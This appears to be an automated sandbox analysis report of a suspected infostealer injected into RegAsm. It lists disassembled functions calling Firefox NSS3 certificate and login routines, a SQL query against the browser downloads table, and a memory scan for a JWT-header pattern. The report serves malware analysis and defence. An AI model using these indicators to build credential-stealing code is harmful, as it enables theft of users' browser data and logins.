                                                                                                                                                                                                                                                                  • CERT_DestroyCertificate.NSS3(?), ref: 6C91DDB7
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 653623313-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                                                                                                                  • Instruction ID: 53ea6206a81fd36ddee3d4640f382a4d765c0b4a50340e76ac31262ce1f4f4ad
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB21B1BAE0511D5BDF029EA4DC829DE77B8AF25208F150064EC19A7F01E731E914CBE1
                                                                                                                                                                                                                                                                  Function 6C913C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,?,6C98460B,?,?), ref: 6C913CA9
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C913CB9
                                                                                                                                                                                                                                                                  • PL_HashTableLookup.NSS3(?), ref: 6C913CC9
                                                                                                                                                                                                                                                                  • SECITEM_DupItem_Util.NSS3(00000000), ref: 6C913CD6
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3 ref: 6C913CE6
                                                                                                                                                                                                                                                                  • CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6C913CF6
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C913D03
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3 ref: 6C913D15
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: TlsGetValue.KERNEL32 ref: 6C9BDD8C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9BDDB4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1376842649-0
                                                                                                                                                                                                                                                                  • Opcode ID: ca5b2f39ebec86ef9e1db45f02bcef463f6fafc5324f22a7ff64875404593c81
                                                                                                                                                                                                                                                                  • Instruction ID: 14a913de53f72434a51798d6881cc32771b867fe533f5c02de12d450fa9d1ed1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca5b2f39ebec86ef9e1db45f02bcef463f6fafc5324f22a7ff64875404593c81
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D112C7EE0421AA7EB012A35DC0A9A63A7CFB2225CF148130ED1C53F11F721DD5AC6E1
                                                                                                                                                                                                                                                                  Function 6C988C10 Relevance: 10.8, APIs: 7, Instructions: 279COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C988C93
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968A60: TlsGetValue.KERNEL32(6C9161C4,?,6C915F9C,00000000), ref: 6C968A81
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968A60: TlsGetValue.KERNEL32(?,?,?,6C915F9C,00000000), ref: 6C968A9E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968A60: EnterCriticalSection.KERNEL32(?,?,?,?,6C915F9C,00000000), ref: 6C968AB7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968A60: PR_Unlock.NSS3(?,?,?,?,?,6C915F9C,00000000), ref: 6C968AD2
                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 6C988CFB
                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 6C988D10
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968970: TlsGetValue.KERNEL32(?,00000000,6C9161C4,?,6C915639,00000000), ref: 6C968991
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968970: TlsGetValue.KERNEL32(?,?,?,?,?,6C915639,00000000), ref: 6C9689AD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C915639,00000000), ref: 6C9689C6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968970: PR_WaitCondVar.NSS3 ref: 6C9689F7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C968970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6C915639,00000000), ref: 6C968A0C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Value$CriticalEnterSectionUnlockmemset$CondErrorWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2412912262-0
                                                                                                                                                                                                                                                                  • Opcode ID: d4893b9943a0f77e274ed30dc4e29c06b8fe4820476838a1fe9f644588dea5cc
                                                                                                                                                                                                                                                                  • Instruction ID: 07b630d493ae408342aa044cca580e9b62a72999dcf4a65e33804d6a7e59d5d9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4893b9943a0f77e274ed30dc4e29c06b8fe4820476838a1fe9f644588dea5cc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EDB19DB0D013089BDB18CF65CC40AAEB7BAFF58308F14452EE81AA7751E731E955CBA4
                                                                                                                                                                                                                                                                  Function 00407535 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040753A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00407806
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040781A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
                                                                                                                                                                                                                                                                  • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                                                                                                                                                                                                  • API String ID: 3193997572-2241552939
                                                                                                                                                                                                                                                                  • Opcode ID: bcc543eefcf2c2f2555299bea3a20ccd21b1770efe986b3215f9286995e717f4
                                                                                                                                                                                                                                                                  • Instruction ID: b3b447972ce448a953535ced37bc291fc8760a316390523261cb09c02331c862
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bcc543eefcf2c2f2555299bea3a20ccd21b1770efe986b3215f9286995e717f4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FDB13C71904248EADB15EBE5D955BEDBBB4AF15308F2440BEE006735C2EB781B0CDB25
                                                                                                                                                                                                                                                                  Function 6C919C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9311C0: PR_NewLock.NSS3 ref: 6C931216
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C919E17
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C919E25
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C919E4E
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C919EA2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C929500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6C929546
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C919EB6
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3 ref: 6C919ED9
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C919F18
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3381623595-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2bae78ade3733672dac9974a32122122cab77b995a94211c24591e95f68002e8
                                                                                                                                                                                                                                                                  • Instruction ID: 1972817d63d23663558fac8dc44e4b8eca3c64b793ff7ba2cba43821920d39c4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2bae78ade3733672dac9974a32122122cab77b995a94211c24591e95f68002e8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 868127B5A04305ABEB009F34CC42AAB77A9BF6534CF054528EC8987F01FB31E918C7A1
                                                                                                                                                                                                                                                                  Function 6C92DCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6C92AB10: DeleteCriticalSection.KERNEL32(D958E852,6C931397,5B5F5EC0,?,?,6C92B1EE,2404110F,?,?), ref: 6C92AB3C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C92AB10: free.MOZGLUE(D958E836,?,6C92B1EE,2404110F,?,?), ref: 6C92AB49
                                                                                                                                                                                                                                                                    • Part of subcall function 6C92AB10: DeleteCriticalSection.KERNEL32(5D5E6CB2), ref: 6C92AB5C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C92AB10: free.MOZGLUE(5D5E6CA6), ref: 6C92AB63
                                                                                                                                                                                                                                                                    • Part of subcall function 6C92AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C92AB6F
                                                                                                                                                                                                                                                                    • Part of subcall function 6C92AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C92AB76
                                                                                                                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C92DCFA
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000), ref: 6C92DD0E
                                                                                                                                                                                                                                                                  • PK11_IsFriendly.NSS3(?), ref: 6C92DD73
                                                                                                                                                                                                                                                                  • PK11_IsLoggedIn.NSS3(?,00000000), ref: 6C92DD8B
                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C92DE81
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C92DEA6
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C92DF08
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 519503562-0
                                                                                                                                                                                                                                                                  • Opcode ID: cbe629f286b73179ca94c9465702527a4d338f610ced69eeeb7bb2bc58909159
                                                                                                                                                                                                                                                                  • Instruction ID: 316daf3da974013878913864d6e4b6196d3e3036b0143e19a5c7c7e12237443f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbe629f286b73179ca94c9465702527a4d338f610ced69eeeb7bb2bc58909159
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF91F8B6A101019FDB00CF68C880BABB7B5FF64309F258029DC599BB49E739E955CBD1
                                                                                                                                                                                                                                                                  Function 6C93BCF0 Relevance: 10.6, APIs: 7, Instructions: 142memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CERT_NewCertList.NSS3 ref: 6C93BD1E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C912F0A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C912F1D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9557D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C91B41E,00000000,00000000,?,00000000,?,6C91B41E,00000000,00000000,00000001,?), ref: 6C9557E0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9557D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C955843
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C93BD8C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FAB0: free.MOZGLUE(?,-00000001,?,?,6C90F673,00000000,00000000), ref: 6C96FAC7
                                                                                                                                                                                                                                                                  • CERT_DestroyCertList.NSS3(00000000), ref: 6C93BD9B
                                                                                                                                                                                                                                                                  • SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C93BDA9
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C93BE3A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C913EC2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C913ED6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C913EEE
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: PR_CallOnce.NSS3(6CA72AA4,6C9712D0), ref: 6C913F02
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: PL_FreeArenaPool.NSS3 ref: 6C913F14
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C913F27
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C93BE52
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C912CDA,?,00000000), ref: 6C912E1E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C912E33
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: TlsGetValue.KERNEL32 ref: 6C912E4E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: EnterCriticalSection.KERNEL32(?), ref: 6C912E5E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: PL_HashTableLookup.NSS3(?), ref: 6C912E71
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: PL_HashTableRemove.NSS3(?), ref: 6C912E84
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C912E96
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: PR_Unlock.NSS3 ref: 6C912EA9
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C93BE61
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2178860483-0
                                                                                                                                                                                                                                                                  • Opcode ID: fdda6f5c8381f0c7779c51b719e01e12ac55ff0002c325abed93a51a095ae3f7
                                                                                                                                                                                                                                                                  • Instruction ID: 082df50db62114fa1c17c1a5001655888d98b8241af3ae89fc65916d5f7a0c62
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fdda6f5c8381f0c7779c51b719e01e12ac55ff0002c325abed93a51a095ae3f7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 784102B5A00620AFD720DF28DC80B6A77F8EF65718F008168F91D97B51E731E814CBA2
                                                                                                                                                                                                                                                                  Function 0040F3CF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F3E3
                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 0040F404
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F21D: strlen.MSVCRT ref: 0040F229
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F21D: strlen.MSVCRT ref: 0040F23F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F21D: strlen.MSVCRT ref: 0040F2D8
                                                                                                                                                                                                                                                                  • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,00000000,?,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000,000000FF), ref: 0040F431
                                                                                                                                                                                                                                                                  • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 0040F4FB
                                                                                                                                                                                                                                                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0040F50C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
